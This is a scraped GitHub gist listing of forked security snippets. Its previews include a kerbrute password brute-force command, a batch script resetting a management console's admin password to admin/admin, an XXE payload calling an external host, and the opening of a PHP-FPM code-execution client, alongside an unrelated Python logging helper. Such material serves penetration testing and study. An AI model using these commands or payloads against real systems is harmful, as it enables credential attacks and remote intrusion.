With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Y4er
/ kerberos_attacks_cheatsheet.md
Created
November 12, 2020 01:55
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
Y4er
/ resetpass.bat
Created
October 27, 2020 08:25
— forked from SuzuneToumyou/resetpass.bat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| setlocal | |
| set CATALINA_HOME=%CD%\..\tomcat | |
| set JRE_HOME=%CD%\..\jre | |
| "%JRE_HOME%\bin\java.exe" -Xms64m -Xmx256m -XX:MinHeapFreeRatio=30 -XX:MaxHeapFreeRatio=40 -classpath "%CD%\..\bin\inst.jar;%CD%\..\bin\inst-res.jar" -Dcatalina.home="%CATALINA_HOME%" -Djava.library.path="%CATALINA_HOME%\bin;%CATALINA_HOME%\..\ASA\win32" com.sygate.scm.tools.DatabaseFrame setpassword admin admin | |
| endlocal |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
Y4er
/ fpm.py
Created
November 25, 2019 01:05
— forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import random | |
| import argparse | |
| import sys | |
| from io import BytesIO | |
| # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client | |
| PY2 = True if sys.version_info.major == 2 else False |
Y4er
/ ansistrm.py
Created
January 12, 2019 14:37
— forked from vsajip/ansistrm.py
Python logging: colourising terminal output
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license. | |
| # | |
| import ctypes | |
| import logging | |
| import os | |
| class ColorizingStreamHandler(logging.StreamHandler): | |
| # color names to indices |